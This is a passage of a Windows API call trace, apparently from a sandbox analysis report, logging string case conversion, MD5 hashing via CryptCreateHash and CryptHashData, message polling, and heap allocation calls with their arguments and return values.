wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.627] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.627] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.627] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.627] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.627] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.627] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.628] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.628] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.628] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.628] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.628] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.628] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.628] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.628] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.628] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.628] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.628] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.628] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.629] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.629] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.629] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.629] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.629] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.629] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.629] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.629] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.629] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.629] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.629] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.629] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.630] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0157.630] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0157.630] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0157.630] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0157.630] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0157.630] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0157.630] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0157.630] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0157.630] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0157.630] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0157.630] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.630] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.630] CryptCreateHash (in: hProv=0xab2890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0158.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0158.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0158.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2748 [0158.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac228 [0158.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac1e0 [0158.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac1f8 [0158.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2758 [0158.139] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0158.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0158.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac138 [0158.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13b8 [0158.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac1c8 [0158.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b26f8 [0158.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac1b0 [0158.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b26e8 [0158.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac120 [0158.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2718 [0158.139] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0158.140] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0158.140] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac048 [0158.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2628 [0158.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13b8 [0158.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abfe8 [0158.140] CryptHashData (hHash=0xaa55e0, pbData=0x24b26e8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0158.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0158.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0158.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2738 [0158.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac048 [0158.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abf28 [0158.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abfd0 [0158.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2698 [0158.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abfd0 | out: hHeap=0x25c0000) returned 1 [0158.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2698 | out: hHeap=0x25c0000) returned 1 [0158.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf28 | out: hHeap=0x25c0000) returned 1 [0158.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abf28 [0158.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abfd0 [0158.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac000 [0158.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2698 [0158.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac000 | out: hHeap=0x25c0000) returned 1 [0158.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2698 | out: hHeap=0x25c0000) returned 1 [0158.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abfd0 | out: hHeap=0x25c0000) returned 1 [0158.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abfd0 [0158.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac000 [0158.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac018 [0158.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2698 [0158.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac018 | out: hHeap=0x25c0000) returned 1 [0158.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2698 | out: hHeap=0x25c0000) returned 1 [0158.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac000 | out: hHeap=0x25c0000) returned 1 [0158.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0158.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0158.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac000 [0158.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2698 [0158.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac018 [0158.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac150 [0158.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac2a0 [0158.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2628 [0158.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac2a0 | out: hHeap=0x25c0000) returned 1 [0158.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2628 | out: hHeap=0x25c0000) returned 1 [0158.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac150 | out: hHeap=0x25c0000) returned 1 [0158.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac150 [0158.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac2a0 [0158.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac288 [0158.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2628 [0158.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac288 | out: hHeap=0x25c0000) returned 1 [0158.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2628 | out: hHeap=0x25c0000) returned 1 [0158.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac2a0 | out: hHeap=0x25c0000) returned 1 [0158.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13b8 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b26d8 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b26a8 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2758 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abfe8 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac030 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2718 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abd90 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf40 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abee0 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac168 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abe20 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac1c8 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab088 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac138 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac120 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac1b0 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac078 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac198 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac108 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac210 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac090 | out: hHeap=0x25c0000) returned 1 [0158.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac0f0 | out: hHeap=0x25c0000) returned 1 [0158.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac060 | out: hHeap=0x25c0000) returned 1 [0158.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abe50 | out: hHeap=0x25c0000) returned 1 [0158.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0158.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2688 | out: hHeap=0x25c0000) returned 1 [0158.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac228 | out: hHeap=0x25c0000) returned 1 [0158.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac1e0 | out: hHeap=0x25c0000) returned 1 [0158.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac1f8 | out: hHeap=0x25c0000) returned 1 [0158.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac240 | out: hHeap=0x25c0000) returned 1 [0158.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac2b8 | out: hHeap=0x25c0000) returned 1 [0158.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac270 | out: hHeap=0x25c0000) returned 1 [0158.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0158.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2748 | out: hHeap=0x25c0000) returned 1 [0158.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0158.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0158.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0158.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2748 [0158.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2688 [0158.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2078 [0158.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0158.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2718 [0158.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac270 [0158.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac2b8 [0158.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2758 [0158.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac240 [0158.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2758 | out: hHeap=0x25c0000) returned 1 [0158.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac240 | out: hHeap=0x25c0000) returned 1 [0158.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac2b8 | out: hHeap=0x25c0000) returned 1 [0158.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac270 | out: hHeap=0x25c0000) returned 1 [0158.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2718 | out: hHeap=0x25c0000) returned 1 [0158.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0158.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0158.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2688 | out: hHeap=0x25c0000) returned 1 [0158.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2748 | out: hHeap=0x25c0000) returned 1 [0158.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0158.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0158.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2748 [0158.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac270 [0158.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac2b8 [0158.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2688 [0158.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4708 [0158.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2078 [0158.144] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0158.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4708 | out: hHeap=0x25c0000) returned 1 [0158.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0158.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac240 [0158.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0158.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2078 [0158.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2718 [0158.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac1f8 [0158.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac1e0 [0158.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2758 [0158.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac228 [0158.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2758 | out: hHeap=0x25c0000) returned 1 [0158.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2758 [0158.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4708 [0158.145] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0158.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4708 | out: hHeap=0x25c0000) returned 1 [0158.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2758 | out: hHeap=0x25c0000) returned 1 [0158.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac228 | out: hHeap=0x25c0000) returned 1 [0158.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac1e0 | out: hHeap=0x25c0000) returned 1 [0158.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac1f8 | out: hHeap=0x25c0000) returned 1 [0158.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2718 | out: hHeap=0x25c0000) returned 1 [0158.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0158.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0158.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0158.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2078 [0158.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2718 [0158.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac1f8 [0158.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac1e0 [0158.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2758 [0158.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac228 [0158.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2758 | out: hHeap=0x25c0000) returned 1 [0158.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac228 | out: hHeap=0x25c0000) returned 1 [0158.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac1e0 | out: hHeap=0x25c0000) returned 1 [0158.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac1f8 | out: hHeap=0x25c0000) returned 1 [0158.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2718 | out: hHeap=0x25c0000) returned 1 [0158.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0158.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0158.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac240 | out: hHeap=0x25c0000) returned 1 [0158.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2688 | out: hHeap=0x25c0000) returned 1 [0158.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac240 [0158.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2688 [0158.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac1f8 [0158.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2688 | out: hHeap=0x25c0000) returned 1 [0158.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac1e0 [0158.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2688 [0158.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac228 [0158.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2688 | out: hHeap=0x25c0000) returned 1 [0158.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abe50 [0158.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2688 [0158.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac060 [0158.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2688 | out: hHeap=0x25c0000) returned 1 